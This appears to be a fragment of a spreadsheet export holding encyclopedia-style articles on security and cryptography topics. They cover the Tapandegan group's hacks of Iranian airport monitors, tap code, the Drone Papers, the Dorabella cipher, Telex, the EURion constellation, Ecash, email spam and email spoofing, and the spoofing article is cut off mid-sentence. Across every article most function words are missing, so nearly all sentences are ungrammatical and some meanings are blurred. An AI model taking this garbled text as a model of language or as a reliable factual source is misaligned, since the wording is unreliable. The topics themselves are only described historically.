    <t>tapandegan (palpitaters persian) iranian hacker group known hacking twice arrival departure monitors major international airports iran (mashhad tabriz) 2018 june 2018 respectively, posting anti-government messages images, forcing airports’ authorities turn manually monitors one-by-one.the tapandegan refers acts protest demanding iranian leadership improve economy stop ignoring demands iranian people. news agencies categorized group's acts form protest iran.” history tapandegan first appeared publicly 2018 hacked arrival departure monitors mashhad international airport june 2018 also hacked arrival departure monitors tabriz international airport. group posted anti-government messages images, forcing airports’ authorities turn manually monitors one-by-one. airport officials cities turned sign boards several hours hacking made apologetic public statements.the iranian authorities confirmed cyber-attacks shortly took place widely reported iranian official press international news wires agencies. name alias group's name persian language meaning palpitaters. based messages posted hacked monitors, news sources noted group supports national protests people iran demanding economic improvements.iran seen frequent nationwide protests year demonstrators angered local national officials business leaders accuse corruption oppression. anti-government hacks iranian airports incidents kind since protests began late december. hacking history hacking attacks iran rise recently. august 2016, internet security experts warned hackers found access banking contact details millions iranians hacking telegram accounts. however, clear whether genuine warning attempt hardliners iranian government convince people leave telegram migrate home-grown messaging services, government easy access users’ private information intercept communications. first hack: mashhad international airport according associated press’ report tehran, iran’s official irna news agency reported tapandegan “managed interrupt routine broadcasts monitors” mashhad international airport thursday evening, 2018, “replacing images anti-government protests january [2018]”“for several hours.”sources report according statement posted hackers monitors, group protested “wasting iranians lives financial resources gaza, lebanon syria islamic revolution guards corps (irgc).” message posted sign boards also protested irgc's presence syria, iraq, elsewhere region. group also hacked email mashhad airport civil aviation head, mohsen eidizadeh sent news hack account.mashhad city massive anti-government demonstrations started december spread iranians cities. religious city holy shrine shiite imam located. local authorities clerics city among staunchest hardliners. group expressed support people kazeroon, city fars province, people demonstrating state months. second hack: tabriz international airport according associated press’ report tehran, iran's official irna news agency reported june 2018, hackers “have disrupted arrival departure monitors tabriz international airport country’s northwest.” hackers defaced sign boards evening, showing protest message “wasting iranians’ resources" expressing support iranian truckers strike across iran several weeks.iranian truck drivers went strike week beginning several parts iran, using social media mobilize share images protesting wages rising business costs.the iranian state-run site, young journalists’ club (yjc), “quoted tabriz governor aliyar rastgoo saying incident happened wednesday 9:30 p.m. local time.” tabriz airport official mostafa safaei confirmed cyber-attack monitors turned following hack engineers quickly restored system, incident investigation.translation message posted hackers monitors persian reads: attention, attention. tapandegan, another protest action, currently taking control computer systems airport. weeks ago, protest wastage iranian people’s money lives (iran’s) islamic revolutionary guard corps, took control computer systems mashhad airport. today, voicing support iranian strikers, thing. until regime deprive people rights better livelihood economic situation?! until when?! choke voices. continue actions. support take photo share tapandegan assumed responsibility hacking tweet june news hacking broke almost immediately social media iranians posted tweets pictures incident. however, posts came pseudonyms users inside iran fear heavy-handed clampdown government.sources report tapandegan sent email iranian journalists saying, “two weeks ago, took computer systems mashhad airport support national protests. protested wasting iranian lives assets irgc [the islamic revolutionary guard corps]. and, today, support truck drivers, bazar, strikers”. third attack: hacking islamic republic international broadcasting (irib) iranian embassy berlin chief iran's cyber police, seyed kamal hadianfar, claimed hackers attacked mashhad tabriz airports identified arrested. according report asiaonline, january 2019, tapandegan hacked allegedly irib's computer systems, including irib's director asgari, deputy abutalebi, irib's political news director seyyed mehdi, email iranian counselor berlin zamani, sent emails irib's employees, majlis speaker larijani majlis members, well journalists. this email, according report, claims secret information leaked regarding transfer trillion touman year usd, double iran's foreign ministry annual budget, iran's foreign minister javad zarif lebanese hizballah, advisor shirkhodaei, special team, iranian ambassador lebanon. group claims hold documents related information hacking irib's computer systems email iranian counselor berlin. tapandegan blamed zarif money laundering accusing offices iran money laundering. asiaonline.ir published entire email allegedly sent tapandegan. documents exposed this group hacked emails islamic republic's authorities. they hacked tehran municipality's gmail account, entered municipality's twitter instagram accounts, sent email municipality's email system members iranian parliament majlis including speaker larijani, motahari, mahmoud-sadeghi majlis members, complained concerning economic mismanagement absence social justice, asked trial corrupt individuals putting rampant corruption country. tapandegan calls stop corruption iranian leadership exposing allegedly top-secret related information received insiders whistleblowers. august 2018, tapadengan exposed letter received whistleblower, claimed ministries irgc ignoring direct order, iran's supreme leader khamenei limit downsize irgc's involvement control private sector economy. leaked information included names irgc's subsidiaries, operated private companies. august 2018: tapandegan exposed secret document, leaked group, regarding purchase 5-star-hotel city mashhad price us$28 million vacation irgc officers. purchase taking place 2018 national protests broke throughout iran protesting deteriorating economic conditions.in video posted youtube, tapandegan released information concerning claimed infiltration iran's computer systems claimed hacked email accounts senior managers employees airports country. documents released group show iranian authorities concerned tapandegan's ability hack computer systems government agencies, financial institutions, military "called upon relevant responsible personnel check quickly. also 2017–18 iranian protests 2018 dervish protests 2018 khuzestan protests iranian cyber army cyberwarfare iran mashhad international airport tabriz international airport references</t>
  </si>
  <si>
    <t>Tap code</t>
  </si>
  <si>
    <t>code, sometimes called knock code, encode text messages letter-by-letter basis simple way. message transmitted using series sounds, hence name. code commonly used prisoners communicate other. method communicating usually tapping either metal bars, pipes walls inside cell. design code based polybius square using grid letters representing letters latin alphabet, except represented each letter communicated tapping numbers, first designating second (after pause) designating column. example, specify letter "b", taps once, pauses, taps twice. listener needs discriminate timing taps isolate letters. communicate word "water", cipher would following (with pause number pair shorter pause letters): letter used break sentences, acknowledgements. because difficulty length time required specifying single letter, prisoners often devise abbreviations acronyms common items phrases, "gn" good night, "gbu" bless you.by comparison, morse code harder send tapping banging requires ability create taps clear precise rhythm. morse code also takes longer learn. learning system simply requires know alphabet short sequence "aflqv" (the initial letter row), without memorising entire grid. example, person hears four knocks, think "a... f... l... pause three knocks, think "q... r... arrive letter history origins encoding back polybius square ancient greece. like "knock code", cyrillic script version said used nihilist prisoners russian czars. knock code featured arthur koestler's 1941 work darkness noon. kurt vonnegut's 1952 novel player piano also includes conversation prisoners using form code. code used novel primitive make polybius square (e.g. consists sixteen taps row). united states prisoners vietnam known used code. introduced june 1965 four pows held ("hanoi hilton") prison: captain carlyle "smitty" harris, lieutenant phillip butler, lieutenant robert peel, lieutenant commander robert shumaker. harris heard code used prisoners world remembered united states force instructor discussed well.in vietnam, code became successful otherwise isolated prisoners communicate. pows would code order communicate cells guards would unable pick they used communicate everything questions interrogators asking order everyone stay consistent deceptive story), hurt needed others donate meager food rations. easy teach newly arrived prisoners became fluent within days. even used prisoners sitting next allowed talk, tapping another's thigh. overcoming isolation code, prisoners said able maintain chain command keep morale. references external links online code encoder/decoder russian prison codes alfabeto quadrato(codice colpi) degrida artist degrida's code artistic illustration.</t>
  </si>
  <si>
    <t>Drone Papers</t>
  </si>
  <si>
    <t>drone papers leak national security documents published intercept october 2015 united states's drone warfare. leak revealed bureaucratic process approving drone strike. five-month period, primary sources showed percent united states drone killings "not intended targets". response micah zenko foreign policy wrote drone papers "mandate congressional investigation" expect happen obama administration. references external links official website</t>
  </si>
  <si>
    <t>Dorabella Cipher</t>
  </si>
  <si>
    <t>dorabella cipher enciphered letter written composer edward elgar dora penny, accompanied another dated july 1897. penny never deciphered meaning remains unknown. cipher, consisting characters spread lines, appears made symbols, symbol consisting approximate semicircles oriented directions (the orientation several characters ambiguous). small appears fifth character third line. background dora penny (1874-1964) daughter reverend alfred penny (1845-1935) wolverhampton. dora's mother died february 1874, days giving birth dora, father worked many years missionary melanesia. 1895 dora's father remarried, dora's stepmother friend caroline alice elgar. july 1897 penny family invited edward alice elgar stay wolverhampton rectory days. edward elgar forty-year-old music teacher become successful composer. dora penny almost seventeen years junior. edward dora liked another remained friends rest composer's life: elgar named variation 1899 variations original theme (enigma) dorabella dedication dora penny. returning great malvern july 1897 alice wrote letter thanks penny family. edward elgar inserted note cryptic writing: pencilled name 'miss penny' reverse. this note laid drawer forty years became generally known dora reproduced memoir edward elgar: memories variation, published methuen publishing 1937. subsequently, original note lost. dora claimed never able read note, assumed cipher message. composer historian kevin jones advanced view; dora's father returned melanesia missionary many years. fascinated local language culture, possessed traditional talismans decorated arcane glyphs. perhaps item surfaced conversation piece elgars' week wolverhampton? dora recalled writing memoirs, might account fact coded message referred 'inscription' communicating director soas many years later. elgar interested ciphers: elgar birthplace museum preserves four articles pall mall magazine 1896 entitled secrets cipher wooden elgar painted solution cipher fourth articles presented insoluble "nihilist cipher". proposed solutions eric sams, musicologist, produced interpretation 1970. interpretation message starts: larks! it's chaotic, cloak obscures letters, [alpha, beta, greek letters alphabet] below: dark makes sigh when long gone. length text letters (ignoring parenthetic note greek), whereas original text contains characters: sams claimed surplus letters implied phonetic shorthand. javier atance suggested solution text melody, different positions semicircles, turning clockwise, corresponding notes scale, semicircle different levels corresponding natural, flat sharp notes. roberts claims solution simple substitution cipher offers statistical justification: p.s. droop beige weeds pure idiocy entire bed! luigi ccibunud luv’ngly tuned liuto studo two. december 2011 canadian cryptographer enthusiast richard henderson claimed found correct clear text, encoded simple substitution cipher (with letters nulls), although details remain worked out. solution would read: very sad, belle. roses e.e. ever fond dora. know love. affection. july 2020, wayne packwood claimed journal musical opinion produced complete decryption: woman like chess make many sacrifices queen victory commands better secondary message identified word rats, packwood believed playful acknowledgement edward individual broke cipher. packwood's method involved rearranging cipher based position several dots, packwood identified representing conductor's baton, arbitrarily shifting presumed values glyph independently message emerged. logic behind pattern shifts explained. 2007 elgar society competition elgar society advertised dorabella cipher competition 2007 mark 150th anniversary elgar's birth. number entries received none found satisfactory: "one entries contain impressively ambitious thoughtful analysis. these entries, though, matched elgar's symbols alphabet, invariably ended fairly arbitrary sequence letters. [t]he results read disconnected chain bizarre utterances, imaginative mind could conjure group random letters". references external links http://www.elgarfoundation.org/ http://www.bbc.co.uk/proms/2007/interact/puzzles/variations.shtml dunin, elonka, 2006, mammoth book secret codes cryptograms, isbn 0-7867-1726-2 (contains image cipher) http://unsolvedproblems.org/index_files/dorabella.htm french) dorabella code http://unsolvedproblems.org/s121.pdf</t>
  </si>
  <si>
    <t>Telex (anti-censorship system)</t>
  </si>
  <si>
    <t>telex research anti-censorship system would allow users circumvent censor without alerting censor circumvention. ready real users, proof-of-concept mock system exists. 2018, telex evolved refraction networking. purpose telex complements services like (anonymity network) placing telex stations network infrastructure free countries. client create tunnel indistinguishable allowed traffic. that way, firewalls censored countries neither able detect block access specific parts internet, assuming allow access all. also domain fronting references external links official website</t>
  </si>
  <si>
    <t>EURion constellation</t>
  </si>
  <si>
    <t>eurion constellation (also known omron rings doughnuts) pattern symbols incorporated number secure documents banknotes ownership title certificates designs worldwide since 1996. added help imaging software detect presence document digital image. such software block user reproducing banknotes prevent counterfeiting using colour photocopiers. description name "eurion constellation" coined security researcher markus kuhn, uncovered pattern euro (€10) banknote early 2002 experimenting xerox colour photocopier refused reproduce banknotes. pattern never mentioned officially; kuhn named eurion constellation resembled astronomical orion constellation, 4217 designation euro currency.the eurion constellation first described kuhn consists pattern five small yellow, green orange circles, repeated across areas banknote different orientations. mere presence five circles page sufficient colour photocopiers refuse processing. some banks integrate constellation tightly remaining design note. german banknotes, eurion circles formed innermost circles background pattern fine concentric circles. front former bank england elgar notes, appear green heads musical notes; however, smith notes 2007 circles merely cluster around "£20" text. u.s. bills, appear digit zero small, yellow numbers matching value note. japanese yen, circles sometimes appear flowers. technical details regarding eurion constellation kept secret inventors users. 1995 patent application suggests pattern detection algorithm designed omron corporation, japanese electronics company. also clear whether feature official name. term "omron anti-photocopying feature" appeared august 2005 press release reserve bank india. 2007 term "omron rings" used award announcement banknote collectors society. usage following table lists banknotes eurion constellation found far. current currencies recent banknotes constellation bold. other banknote detection mechanisms counterfeit deterrence system since 2003, image editors adobe photoshop paint shop refuse print banknotes. according wired.com, banknote detection code applications, called counterfeit deterrence system (cds), designed central bank counterfeit deterrence group supplied companies adobe binary module. experiments steven murdoch others showed banknote detection code rely eurion pattern. instead detects digital watermark embedded images, developed digimarc. also printer steganography, used colour laser printers hidden encoded information printouts coded anti-piracy, anti–copyright-infringement technology marks film print motion picture distinguishing patterns dots, used forensic identifier identify source illegal copies notes some currencies (marked [€]) replaced euro complete adoption eurion. references further reading "photoshop cds" (press release). adobe systems incorporated. external links rules currency image use- website central bank counterfeit deterrence group (cbcdg) nieves, ruiz-agundez, bringas, (2010), 'recognizing banknote patterns protecting economic transactionsdatabase expert systems applications (dexa), 2010 workshop on', ieee, 247—249. data genetics, anti counterfeit measures</t>
  </si>
  <si>
    <t>Ecash</t>
  </si>
  <si>
    <t>ecash conceived david chaum anonymous cryptographic electronic money electronic cash system 1983. realized corporation digicash used micropayment system bank 1995 1998. design chaum published idea anonymous electronic money 1983 paper; ecash software user's local computer stored money digital format, cryptographically signed bank. user could spend digital money shop accepting ecash, without open account vendor first, transmitting credit card numbers. security ensured public digital signature schemes. blind signatures achieved unlinkability withdrawal spend transactions. depending payment transactions, distinguishes on-line off-line electronic cash: payee contact third party (e.g., bank credit-card company acting acquirer) accepting payment, system called on-line system. 1990, chaum together moni naor proposed first off-line e-cash system, also based blind signatures. history chaum started company digicash 1989 "ecash" trademark. raised million david marquardt 1997 nicholas negroponte chairman. yet, united states, bank mark twain bank saint louis,mo implemented ecash, testing micropayment system; similar credit cards, system free purchasers, merchants paid transaction fee. after three-year trial signed merely 5,000 customers, system dissolved 1998, year bank purchased mercantile bank, large issuer credit cards. david chaum opined grew, average level sophistication users dropped. hard explain importance privacy them”.in europe, fewer credit cards cash transactions, micropayment technologies made sense. june 1998, ecash became available credit suisse switzerland, available deutsche bank germany, bank austria, sweden's posten norske bank norway, japan nomura research institute marketed ecash financial institutions. australia, ecash implemented st.george bank advance bank, transactions free purchasers. finland merita bank/eunet made ecash available.digicash went bankrupt 1998, despite flourishing electronic commerce, credit cards "currency choice".digicash sold ecash technologies, including ecash patents. 2000 ecash technologies sued ecash.com, alleging trademark infringement unfair competition. ecash.com counterclaimed ecash technologies' trademark registration fraudulently obtained, failed disclose ecash.com's registration "ecash.com" domain name u.s. patent trademark office. court rejected ecash.com's counterclaim saying trademark applicant must disclose third party's rights "clearly established." court argued "mere registration domain name confer trademark rights, alone "clearly established" rights, ecash technologies duty disclose defendant's registration “ecash.com” domain name pto, however ecash technologies subsequently went bankrupt domain "ecash.com" remained possession original owner. 2002 ecash technologies acquired infospace, currently known blucora. 2015, term ecash used digital cash stored electronically sensitive card including online alternative payment portals mobile applications. also e-commerce references literature schneier, bruce. applied cryptography, second edition, john wiley sons, 1996. isbn 0-471-11709-9 (chapter 6.4) richard mollin: public-key cryptography. 143-148. 2002, isbn 1-58488-338-3, isbn 978-1-58488-338-8. goldwasser, bellare, "lecture notes cryptography". summer course cryptography, mit, 1996-2001. 233. external links introduction ecash wayback machine (archived october 1997) "detecting double-spending" -(hal finney's introduction chaumian digital cash) "ecash.com" -(ecash.com)</t>
  </si>
  <si>
    <t>Email spam</t>
  </si>
  <si>
    <t>email spam, also referred junk email simply spam, unsolicited messages sent bulk email (spamming). name comes monty python sketch name canned pork product spam ubiquitous, unavoidable, repetitive. email spam steadily grown since early 1990s, 2014 estimated account around total email traffic.since expense spam borne mostly recipient, effectively postage advertising. this makes excellent example negative externality.the legal definition status spam varies jurisdiction another, nowhere laws lawsuits particularly successful stemming spam. most email spam messages commercial nature. whether commercial not, many annoying form attention theft, also dangerous contain links lead phishing sites sites hosting malware include malware file attachments. spammers collect email addresses chat rooms, websites, customer lists, newsgroups, viruses harvest users' address books. these collected email addresses sometimes also sold spammers. overview beginning internet (the arpanet), sending commercial email prohibited. gary thuerk sent first email spam message 1978 people. reprimanded told again. spam enforced terms service/acceptable policy (tos/aup) internet service providers (isps) peer pressure. spam sent otherwise reputable organizations lesser companies. when spam sent otherwise reputable companies sometimes referred mainsleaze. mainsleaze makes approximately spam sent internet. spamvertised sites many spam emails contain urls website websites. according cyberoam report 2014, average billion spam messages sent every day. "pharmaceutical products (viagra like) jumped last quarter’s analysis, leading quarter’s spam pack. emails purporting offer jobs fast, easy cash come number two, accounting approximately spam email. and, rounding number three spam emails diet products (such garcinia gummi-gutta garcinia cambogia), accounting approximately 1%." spam also medium fraudsters scam users entering personal information fake sites using emails forged look like banks organizations, paypal. this known phishing. targeted phishing, known information recipient used create forged emails, known spear-phishing. spam techniques appending marketer database containing names, addresses, telephone numbers customers, database matched external database containing email addresses. company means send email people requested email, include people deliberately withheld email address. image spam image spam, image-based spam, obfuscation method text message stored jpeg image displayed email. this prevents text-based spam filters detecting blocking spam messages. image spam reportedly used mid-2000s advertise "pump dump" stocks.often, image spam contains nonsensical, computer-generated text simply annoys reader. however, technology programs tries read images attempting find text images. these programs accurate, sometimes filter innocent images products, words newer technique, however, animated image contain clear text initial frame, contort shapes letters image captcha) avoid detection optical character recognition tools. blank spam blank spam spam lacking payload advertisement. often message body missing altogether, well subject line. still, fits definition spam nature bulk unsolicited email.blank spam originated different ways, either intentional unintentionally: blank spam sent directory harvest attack, form dictionary attack gathering valid addresses email service provider. since goal attack bounces separate invalid addresses valid ones, spammers dispense elements header entire message body, still accomplish goals. blank spam also occur spammer forgets otherwise fails payload spam run. often blank spam headers appear truncated, suggesting computer glitches, software bugs contributed problem—from poorly written spam software malfunctioning relay servers, problems truncate header lines message body. some spam appear blank fact not. example vbs.davinia.b email worm propagates messages subject line appears blank, fact uses html code download files. backscatter spam backscatter side-effect email spam, viruses, worms. happens email servers misconfigured send bogus bounce message envelope sender rejecting quarantining email (rather simply rejecting attempt send message). sender's address forged, bounce innocent party. since messages solicited recipients, substantially similar other, delivered bulk quantities, qualify unsolicited bulk email spam. such, systems generate email backscatter listed various dnsbls violation internet service providers' terms service. legal countermeasures individual organisation identify harm done spam, identify sent able legal remedy, e.g. basis trespass chattels. number large civil settlements way, although others mostly unsuccessful collecting damages.criminal prosecution spammers fraud computer crime statutes also common, particularly illegally accessed computers create botnets, emails phishing forms criminal fraud.finally, countries specific legislation place make certain forms spamming criminal offence, outlined below: european union article european union directive privacy electronic communications (2002/58/ec) provides member states shall take appropriate measures ensure unsolicited communications purposes direct marketing allowed either without consent subscribers concerned respect subscribers wish receive communications, choice options determined national legislation. united kingdom united kingdom, example, unsolicited emails cannot sent individual subscriber unless prior permission obtained unless pre-existing commercial relationship parties. canada 2010 fighting internet wireless spam (which took effect 2014) canadian legislation meant fight spam. australia spam 2003, covers types email phone spam. penalties 10,000 penalty units, 2,000 penalty units person body corporate. united states united states, many states enacted anti-spam laws late 1990s early 2000s. subsequently superseded can-spam 2003, many cases less restrictive. can-spam also preempted state legislation, left related laws specific e-mail intact. courts ruled spam constitute, example, trespass chattels.bulk commercial email violate can-spam, provided meets certain criteria, truthful subject line, forged information headers. fails comply requirements illegal. those opposing spam greeted dismay disappointment, almost immediately dubbing "you spam" act.in practice, little positive impact. 2004, less percent spam complied can-spam, although 2005 review federal trade commission claimed amount sexually explicit spam significantly decreased since 2003 total volume begun level off. many observers viewed failed, although several high-profile prosecutions. deception fraud spammers engage deliberate fraud send messages. spammers often false names, addresses, phone numbers, contact information "disposable" accounts various internet service providers. they also often falsified stolen credit card numbers accounts. this allows move quickly account next host isps discover shut one. senders great lengths conceal origin messages. large companies hire another firm send messages complaints blocking email falls third party. others engage spoofing email addresses (much easier address spoofing). email protocol (smtp) authentication default, spammer pretend originate message apparently email address. prevent this, isps domains require smtp-auth, allowing positive identification specific account email originates. senders cannot completely spoof email delivery chains (the 'received' header), since receiving mailserver records actual connection last mailserver's address. counter this, spammers forge additional delivery headers make appear email previously traversed many legitimate servers. spoofing serious consequences legitimate email users. email inboxes clogged "undeliverable" emails addition volumes spam, mistakenly identified spammer. receive irate email spam victims, spam victims report email address owner isp, example) naïve terminate service spamming. theft service spammers frequently seek make vulnerable third-party systems open mail relays open proxy servers. smtp forwards mail server another—mail servers isps commonly require form authentication ensure user customer isp. increasingly, spammers networks malware-infected (zombies) send spam. zombie networks also known botnets (such zombifying malware known bot, short robot). june 2006, estimated percent email spam sent zombie pcs, increase percent prior year. estimated billion email spam sent june 2006, increase billion june 2005.for first quarter 2010, estimated 305,000 newly activated zombie brought online malicious activity. this number slightly lower 312,000 fourth quarter 2009.brazil produced zombies first quarter 2010. brazil source percent zombies, percent fourth quarter 2009. india percent, vietnam percent, russian federation percent. side effects combat problems posed botnets, open relays, proxy servers, many email server administrators pre-emptively block dynamic ranges impose stringent requirements servers wishing deliver mail. forward-confirmed reverse must correctly outgoing mail server large swaths addresses blocked, sometimes pre-emptively, prevent spam. these measures pose problems wanting small email server inexpensive domestic connection. blacklisting ranges spam emanating also causes problems legitimate email servers range. statistics estimates total volume email spam consistently growing, 2011 trend seemed reverse. amount spam users mailboxes portion total spam sent, since spammers' lists often contain large percentage invalid addresses many spam filters simply delete reject "obvious spam". first known spam email, advertising product presentation, sent 1978 gary thuerk addresses, total number users arpanet 2600 time though software limitations meant slightly half intended recipients actually received august 2010, number spam messages sent estimated around billion. more emails sent internet 2008 unwanted, according microsoft security report. maawg estimates incoming mail "abusive email", second half 2007. sample size maawg's study million mailboxes. 2018 growing affiliation networks email frauds worldwide global email traffic spam ipwarmup.com study, also effects legitimate email senders achieve inbox delivery.a 2010 survey european email users showed respondents opened spam messages, although clicked link. highest amount spam received according steve ballmer 2004, microsoft founder bill gates receives four million emails year, spam. this originally incorrectly reported "per day".at time poskanzer, owner domain name acme.com, receiving million spam emails day. cost spam 2004 survey estimated lost productivity costs internet users united states $21.58 billion annually, another reported cost billion, billion 2003. 2004, worldwide productivity cost spam estimated billion 2005. origin spam because international nature spam, spammer, hijacked spam-sending computer, spamvertised server, user target spam often located different countries. much spam received internet users north america europe traced fewer spammers.in terms volume spam: according sophos, major sources spam fourth quarter 2008 (october december) were: united states (the origin 19.8% spam messages, 18.9% china (9.9%, 5.4%) russia (6.4%, 8.3%) brazil (6.3%, 4.5%) turkey (4.4%, 8.2%)when grouped continents, spam comes mostly from: asia (37.8%, 39.8%) north america (23.6%, 21.8%) europe (23.4%, 23.9%) south america (12.9%, 13.2%)in terms number addresses: spamhaus project ranks three united states, china, russia, followed japan, canada, south korea. terms networks: december 2021, three networks hosting spammers chinanet, amazon, airtel india. anti-spam techniques u.s. department energy computer incident advisory capability (ciac) provided specific countermeasures email spamming.some popular methods filtering refusing spam include email filtering based content email, dns-based blackhole lists (dnsbl), greylisting, spamtraps, enforcing technical requirements email (smtp), checksumming systems detect bulk email, putting sort cost sender proof-of-work system micropayment. each method strengths weaknesses controversial weaknesses. example, company's offer "[remove] spamtrap honeypot addresses" email lists defeats ability methods identify spammers. outbound spam protection combines many techniques scan messages exiting service provider's network, identify spam, taking action blocking message shutting source message. email authentication prevent "from:" address spoofing became popular 2010s. collateral damage measures protect spam cause collateral damage. this includes: measures consume resources, server network. when legitimate messages rejected, sender needs contact recipient channel. when legitimate messages relegated spam folder, sender notified this. recipient periodically checks spam folder, cost time spam easy overlook legitimate messages. methods spammers gathering addresses order send spam, spammers need obtain email addresses intended recipients. end, spammers list merchants gather huge lists potential email addresses. since spam definition, unsolicited, address harvesting done without consent (and sometimes expressed will) address owners. single spam target tens millions possible addresses many invalid, malformed, undeliverable. obfuscating message content many spam-filtering techniques work searching patterns headers bodies messages. instance, user decide email receive word "viagra" subject line spam, instruct mail program automatically delete messages. defeat filters, spammer intentionally misspell commonly filtered words insert characters, often style similar leetspeak, following examples: v1agra, via'gra, vi@graa, vi*gra, \/iagra. this also allows many different ways express given word, making identifying difficult filter software. principle method leave word readable humans (who easily recognize intended word misspellings), likely recognized computer program. this somewhat effective, modern filter patterns designed recognize blacklisted terms various iterations misspelling. other filters target actual obfuscation methods, non-standard punctuation numerals unusual places. similarly, html-based email gives spammer tools obfuscate text. inserting html comments letters foil filters. another common ploy involves presenting text image, either sent along loaded remote server. defeating bayesian filters bayesian filtering become popular spam-filtering technique, spammers started using methods weaken rough approximation, bayesian filters rely word probabilities. message contains many words used spam, never used spam, likely spam. weaken bayesian filters, spammers, alongside sales pitch, include lines irrelevant, random words, technique known bayesian poisoning. spam-support services number online activities business practices considered anti-spam activists connected spamming. these sometimes termed spam-support services: business services, actual sending spam itself, permit spammer continue operating. spam-support services include processing orders goods advertised spam, hosting sites records referenced spam messages, number specific services follows: some internet hosting firms advertise bulk-friendly bulletproof hosting. this means that, unlike isps, terminate customer spamming. these hosting firms operate clients larger isps, many eventually taken offline larger isps result complaints regarding spam activity. thus, firm advertise bulletproof hosting, ultimately unable deliver without connivance upstream isp. however, spammers managed called pink contract (see below) contract allows spam without disconnected. companies produce spamware, software designed spammers. spamware varies widely, include ability import thousands addresses, generate random addresses, insert fraudulent headers messages, dozens hundreds mail servers simultaneously, make open relays. sale spamware illegal eight u.s. states.so-called millions commonly advertised spam. these cd-roms purportedly containing lists email addresses, sending spam addresses. such lists also sold directly online, frequently false claim owners listed addresses requested "opted in") included. such lists often contain invalid addresses. recent years, fallen almost entirely quality email addresses available them, email lists exceed 20gb size. amount longer substantial. number blacklists (dnsbls), including maps rbl, spamhaus sbl, sorbs spews, target providers spam-support services well spammers. dnsbls blacklist ranges persuade isps terminate services known customers spammers resell spammers. related vocabulary unsolicited bulk email (ube) synonym email spam. unsolicited commercial email (uce) spam promoting commercial service product. this common type spam, excludes spams hoaxes (e.g. virus warnings), political advocacy, religious messages, chain letters sent person many people. term common usa. pink contract pink contract service contract offered offers bulk email service spamming clients, violation isp's publicly posted acceptable policy. spamvertising spamvertising advertising medium spam. opt-in, confirmed opt-in, double opt-in, opt-out opt-in, confirmed opt-in, double opt-in, opt-out refers whether people mailing list given option taken out, list. confirmation (and "double", marketing speak) refers email address transmitted e.g. form confirmed actually request joining mailing list, instead added list without verification. final, ultimate solution spam problem (fussp) ironic reference naïve developers believe invented perfect spam filter, stop spam reaching users' inboxes deleting legitimate email accidentally. history also references further reading dow, serenko, turel, wong, (2006), "antecedents consequences user satisfaction email systems", international journal e-collaboration (pdf), vol. 46–64. sjouwerman, stu; posluns, jeffrey, inside spam cartel: trade secrets dark side, elsevier/syngress; edition, november 2004. isbn 978-1-932266-86-3. external links spam info "can spam: spam environment", economist, june 2009.spam reports worldwide email threat activity, barracuda central.government reports industry white papers email address harvesting effectiveness anti-spam filters (pdf), united states: ftc, archived original (pdf) 2007-11-28, retrieved 2007. electronic frontier foundation's spam page contains legislation, analysis, litigation histories getting this spam? unsolicited commercial email research month report center democracy technology author pegasus mail mercury mail transport system david harris spam white paper drowning sewage (pdf), pegasus mail, archived original (pdf) 2007-11-28.</t>
  </si>
  <si>
    <t>Email spoofing</t>
  </si>
  <si>
    <t>email spoofing creation email messages forged sender address. term applies email purporting address actually sender's; mail sent reply address bounce delivered unrelated party whose identity faked. masked email different topic, providing "masked" email address user's normal address, disclosed (for example, cannot harvested), forwards mail sent user's real address.the original transmission protocols used email built-in authentication methods: deficiency allows spam phishing emails spoofing order mislead recipient. more recent countermeasures made spoofing internet sources difficult eliminated internal networks defenses spoof email colleague's compromised computer network. individuals businesses deceived spoof emails suffer significant financial losses; particular, spoofed emails often used infect computers ransomware. technical details when simple mail transfer protocol (smtp) email sent, initial connection provides pieces address information: mail from: generally presented recipient return-path: header normally visible user, default checks done sending system authorized send behalf address. rcpt specifies email address email delivered normally visible user present headers part "received:" header.together, sometimes referred "envelope" addressing analogy traditional paper envelope. unless receiving mail server signals problems either items, sending system sends "data" command, typically sends several header items, including: from: &lt;joeqdoe@example.com&gt; address visible recipient; again, default checks done sending system authorized send behalf address. reply-to: jane &lt;jane.roe@example.mil&gt; similarly checkedand sometimes: sender: &lt;jin.jo@example.jp&gt; also checkedthe result email recipient sees email come address from: header. they sometimes able find mail from address, reply email, either address presented from: reply-to: header, none addresses typically reliable, automated bounce messages generate backscatter. although email spoofing effective forging email address, address computer sending mail generally identified "received:" lines email header. malicious cases, however, likely computer innocent third party infected malware sending email without owner's knowledge. malicious spoofing phishing business email compromise (see below) scams generally involve element email spoofing. email spoofing responsible public incidents serious business financial consequences. this case october 2013 email news agency spoofed look swedish company fingerprint cards. email stated samsung offered purchase company. news spread stock exchange rate surged 50%.malware klez sober among many modern examples often search email addresses within computer infected, addresses targets email, also create credible forged from fields emails send. this ensure emails likely opened. example: alice sent infected email opens, running worm code. worm code searches alice's email address book finds addresses charlie. from alice's computer, worm sends infected email bob, forged appear sent charlie.in case, even bob's system detects incoming mail containing malware, sees source charlie, even though really came alice's computer. meanwhile, alice remain unaware computer infected, charlie know anything all, unless receives error message bob. email spoofing differ spam email phishing? main difference spam spoofed message spammers edit email headers pretend email sent someone else. both phishing spoofing emails trick someone believe message sent legitimate sender. however, main phishers' intent compromise user personal financial information, spoofing emails ways effect mail servers traditionally, mail servers could accept mail item, later send non-delivery report "bounce" message delivered quarantined reason. these would sent "mail from:" "return path" address. with massive rise forged addresses, best practice generate ndrs detected spam, viruses etc. reject email smtp transaction. when mail administrators fail take approach, systems guilty sending "backscatter" emails innocent parties form spam used perform "joe job" attacks. countermeasures ssl/tls system used encrypt server-to-server email traffic also used enforce authentication, practice seldom used, range potential solutions also failed gain traction. number defensive systems come wide used, including: sender policy framework (spf) email authentication method designed detect forging sender addresses delivery email. domainkeys identified mail (dkim) email authentication method designed detect forged sender addresses email (email spoofing), technique often used phishing email spam. domain-based message authentication, reporting conformance (dmarc) email authentication protocol. designed give email domain owners ability protect domain unauthorized use, commonly known email spoofing. purpose primary outcome implementing dmarc protect domain used business email compromise attacks, phishing emails, email scams cyber threat activities.to effectively stop forged email delivered, sending domains, mail servers, receiving system need configured correctly higher standards authentication. although increasing, estimates vary widely percentage emails form domain authentication: 8.6% "almost half". reason, receiving mail systems typically range settings configure treat poorly-configured domains email. business email business email compromise attacks class cyber crime email fraud attack commercial, government non-profit organizations achieve specific outcome negatively impacts target organization. examples include invoice scams spear phishing spoof attacks designed gather data criminal activities. business deceived email spoof suffer additional financial, business continuity reputational damage: fake emails favored route ransomware stop operations unless ransom paid; consumer privacy breaches also enabled. typically, attack targets specific employee roles within organization sending spoof email series spoof emails) fraudulently represent senior colleague (ceo similar) trusted customer. (this type attack known spear phishing). email issue instructions, approving payments releasing client data. emails 